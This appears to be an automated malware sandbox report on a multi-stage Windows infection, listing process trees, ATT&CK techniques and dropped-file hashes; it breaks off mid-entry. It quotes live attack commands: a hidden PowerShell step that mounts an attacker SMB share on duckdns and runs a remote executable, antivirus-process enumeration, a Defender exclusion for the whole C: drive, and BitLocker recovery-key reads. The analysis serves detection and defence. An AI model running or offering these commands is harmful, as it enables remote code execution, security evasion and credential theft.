        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5400
      - C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5620
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1684
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3376
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2600
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2724
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5688
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2948
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5256
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5408
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10450221121\pfJNmVW.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5128
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4704
        
        C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5628
        
        \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        9⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:5160
      - C:\Users\Admin\AppData\Local\Temp\10450230101\a2b268f8c5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450230101\a2b268f8c5.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4088
      - C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4200
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5152
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:2276
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4692
      - C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1152
      - C:\Users\Admin\AppData\Local\Temp\10450260101\RLPhvHg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450260101\RLPhvHg.exe"
        6⤵
        Executes dropped EXE
        
        PID:9060
      - C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:9148
      - C:\Users\Admin\AppData\Local\Temp\10450280101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450280101\qhjMWht.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4232

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:3084
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:212
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:740
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:2904

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAGQALQBtAFAAUABSAEUARgBFAHIAZQBuAEMARQAgAC0AZQB4AGMATAB1AFMAaQBPAG4AcABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEYAcgBhAG0AZQB3AG8AcgBrAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwBSAGMAZQA7ACAAQQBEAGQALQBNAFAAUAByAEUAZgBlAHIAZQBOAEMARQAgAC0AZQBYAGMAbABVAFMAaQBPAE4AcABSAE8AQwBFAHMAUwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAdQByAHIAZQBuAHQAXABGAHIAYQBtAGUAdwBvAHIAawBOAGEAbQBlAC4AZQB4AGUAIAAtAEYAbwByAGMARQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5796

C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4532
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:10592

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:10892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:11852
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:4220
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:6272
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:6600
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:6768

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:11648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
154KB

MD5
4158b6685a53003ce05b254aee107a53

SHA1
73f33988f895f25b171f7069f95ae83aa671f634

SHA256
743f78e939404075bac590e6a221d7b00ddc8859cd58bb9fc2392c2fb651b0eb

SHA512
a3e8d707fd174a8ed6c5d53607e117d42e03bfcd520e86caf0e078382a7a7ed85f8be1c0b8c9e48c77e7cde86d666ed24bf45f9de51cf3ab981d53cc1e8c69e7

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db.tmp

Filesize
154KB

MD5
7b16c192e202d2cc47bd5136e8d71aa1

SHA1
0f3f34dad97ac1fcfe0068aaa775d19d815f8889

SHA256
f02b8b8f055c7ac561075954f7c9b893e45139d59a030955426316ad91d6bf66

SHA512
f45a3f88fb95bc7e62e4c6d0b5f806cd8f62f505eeb887c90e3773038e838af3521c836ffc6873189190cb44c8bfea4672b53e57ef81f98cf827e38098d9c7ee

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
3.3MB

MD5
91424f307b7f0e238aab1f06434a7dc4

SHA1
4fb5ec3082d3545a79e2ccbd4b624320cafd68f1

SHA256
cdc2aa09167bd32f9a01eb60414d0b8faaf8616b9a23a7fc1671bb6bc7f162a1

SHA512
6830052ce91c378e7e21c385fb9a522f57fa59d1082a460a26199dbcfa808b37abad741eb8bf7dfd746d522d37dc03ac9d1674fb429f988873eb6a53fde93f83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
218b5a3ed2b9b1717b53773a6c9ec395

SHA1
e5b8c2d6630c5991691101213f7d1dd7d03d5906

SHA256
0433967d04bb0b3722fd13106ee98b288e60691efd59e2bdad8b1d7502d08b5b

SHA512
851be8f14796818fae3b4b2d5c3c25fbc444de34e95b1690593ab838df89b3fb5238438d000ca0e35521fc1d94893625811e63caee03c3131f7db862658f99c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
1305f8fed5e415166f391fa5d3b4c9f8

SHA1
a9eed79f5cdba4e46ce6083633b0ff437cabea15

SHA256
6ce45f38b0296e1f1bf7c3dce45b35e17ff5e009aeed4a8b43179d45d53657fa

SHA512
5811cb028472ef292f74d12747ffd4fb670b0b79ea694acdc9f71a440f8c8b7d1be0aacda4161d6d1702b533c74fd46c11ac61f1c3cb931e89e1701317778682

Download Submit
C:\Users\Admin\AppData\Local\TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE

Filesize
1.8MB

MD5
7af101c47cc7ca3dc9d589a086f652c5

SHA1
12dd133916d3eb7d0717bb2b4b54f459204b0e3c

SHA256
aede7c76458edd68d86748891ded44ccefc5f35a2118ec3ed6c5fdaf4f715b17

SHA512
054220d8ff5748eaec9f4a73750d0fbfe0fa3ff61f376f2ff153e4a93367dfd75e1dbf60c8bdbb2c038f2c43183235203723570aaf242c6c3849713624915761

Download Submit
C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd

Filesize
258B

MD5
883dc2eefa3767f2644fc6d3b3e55768

SHA1
21840ca7cb5b86db35879df43d6b2760e198ba5b

SHA256
ec5e54764cd4136d7b20c16f79275da7b303e845d061fe7bd8f01bc34b1c3e91

SHA512
e6951cc2c0c81b25e430d6fe13a17b5c8ec81b70ad3c345338ab16b7a4711c43991abccb3d259b1860ba17d14bad82f6a66ddcecf6b3e38ec326c931e3747989

Download Submit
C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe

Filesize
327KB

MD5
17b045d3037b19362f5710ef08a1c3a9

SHA1
b510e63483354299a982f8c8b8425e1611f60ad4

SHA256
ca1cf8c31abcbf6fa6d324098c97bea8452da24cfcf579a52a3d262c93a85557

SHA512
cd96011398083f83d0869df41acf62cc8ccb69ea92b5c83066098f4227aa60bf37af16c4b5118cb5497202c8f78ab4703c9d8acf61ca41f3512d882dd5f79ac0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe

Filesize
7.3MB

MD5
4c1e985ca22c2a899aef2eb4c3995f93

SHA1
40f1dcbda8fca4792b9cf1303357c5a7ec4b2e99

SHA256
947c2577b0f00e15299cbe32bbc22b2652bb76fe3d9a56531cb5d0276218a36a

SHA512
c82e5301ab7ed347546f561ecf41135da5378bc5e999e1c296c69e8ede2d41c941617e80abcd2777688e9bcdfc635ba2ee55b938aaa6eba7d2d2ceffd84b46e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe

Filesize
655KB

MD5
8be309beb3b1ad2b6b49b5a08702cfc2

SHA1
e579f46024d71ec258fa9851f2d79688cae24b3d

SHA256
5efeaaa2e83da921f6b52d0d82cc5038229b1306c8020072794e8c08fd1e51d7

SHA512
e1b21078da69b1a00475af10a3eddde0d5e797998280bdfeef371845ecc9098aa7344ed22595e0ae0cdc6a1d3342181648334a0e860f1fdb243b4b4577c8883a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450200101\e08fa14c46.exe

Filesize
1.7MB

MD5
a203d3780443dc732a03df37eb26af59

SHA1
cbe33fa45525d2d303a9ede5664ddb97c5fec0cd

SHA256
f61c8efcebfa32b872c6eaedc9f0a81361b4fa153813397b6bb02933df743173

SHA512
fad3df9869a13196e9a02fa533c73210f1ac8cc763af65cc6afa7a240c829dbf637732d1c3ec90154ec3db79280c1d76853ad343ce73e18dc0308f34d5e426c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe

Filesize
1.2MB

MD5
7d842fd43659b1a8507b2555770fb23e

SHA1
3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

SHA256
66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

SHA512
d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450230101\a2b268f8c5.exe

Filesize
2.0MB

MD5
d6e90f65b3827a2641fa91ea122718c7

SHA1
57f0d5cff6957b34ea247dd848d04680e48106a0

SHA256
c21bf3c07c5a5e130ef47101d2b56f4b13b88ee7489bbbbcfd3f930e9ef32032

SHA512
c14f13541c37ae9935591aed2b21a8010e94b9a60f98ee574c8f49753229c37f4fd1d780f8f60fd881c086375a650a985b479006f3cf46165304cb8d421b0316

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe

Filesize
1.2MB

MD5
79c47af6671f89ba34da1c332b5d5035

SHA1
4169b11ea22eb798ef101e1051b55a5d51adf3c2

SHA256
6facc38b5b793b240f3a757e0e22187f3b088340ec02c87d90250c2ced4c1600

SHA512
ddda1bf13778e4a8aed6e6f50043512dd54e2f87f8aecef4516a64edc586e9ce6a8b29c792d7cfbc51a1a15d1ec1c4108383a8866ff2a911a8917af6dc2e57b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe

Filesize
1.9MB

MD5
b53f9756f806ea836d98ff3dc92c8c84

SHA1
05c80bd41c04331457374523d7ab896c96b45943

SHA256
73ca9bc319d447e03a717b4f781aca8dc11a5bec82ace59751f285341e4b137c

SHA512
bd776a3f3ae229fb36f54674323ddeea0a631acfc18578860ed282667fcc5047d2b5033aba4f88f5908d909d0969081a94cb1cb3efbb9ecaeff526c0fb2ecddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe

Filesize
1.1MB

MD5
5adca22ead4505f76b50a154b584df03

SHA1
8c7325df64b83926d145f3d36900b415b8c0fa65

SHA256
aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778

SHA512
6192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10450280101\qhjMWht.exe

Filesize
5.8MB

MD5
1dbdcaeaac26f7d34e872439997ee68d

SHA1
18c855f60fb83306f23634b10841655fb32a943b

SHA256
3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

SHA512
aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

Download Submit
C:\Users\Admin\AppData\Local\Temp\262.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\418377\N

Filesize
519KB

MD5
c3356a6d4dff71a6721d5f0db2a6f171

SHA1
368b06cd5ae0fd4ec497d22a884d9edbf16b14c0

SHA256
4537d306c85d216900dec8aa86ca7ab1a29b24214f487a5d32ea7939f4174a91

SHA512
0348b65c9bcc668b8ee3647c03515b648628e0e40d6affa6183ceb9e32b6c63f5867c249fb9213c68a6e9bf560448e2d580ce44a2dfea6f39639b168470937ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com

Filesize
1KB

MD5
dcb04e7a3a8ac708b3e93456a8e999bb

SHA1
7e94683d8035594660d0e49467d96a5848074970

SHA256
3982552d9cd3de80fadf439316699cbc6037f5caa45b0046a367561ff90a80d5

SHA512
c035046cfc752883afecdc1efd02a868cf19c97b01b08e3e27606ffedb3a052b14637f51cd6e627928660cd76d31f15dbd9a537446fc5f4a92537874a6dcd094

Download Submit
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\A9CD.tmp\A9CE.tmp\A9CF.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Asbestos

Filesize
88KB

MD5
042f1974ea278a58eca3904571be1f03

SHA1
44e88a5afd2941fdfbda5478a85d09df63c14307

SHA256
77f4020549b3bcb36ce3e7701cc5831cc0a0f191420997d76701310eb48c6346

SHA512
de2b302b85513d4a6e01aa2e082f8e04481e81aaa5fbd4e419a0055bea45b2db2865dca249b74445b86cf255fbab920050609bbfd75fd166f0bbaecb0894e0e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Badly

Filesize
73KB

MD5
24acab4cd2833bfc225fc1ea55106197

SHA1
9ba3c2e0107de2ac6b3e816e37f9b1a58ca048cb

SHA256
b1095cd77ed823f083295b308bd1ba946c7bd64cea6a5259165389455a64c84e

SHA512
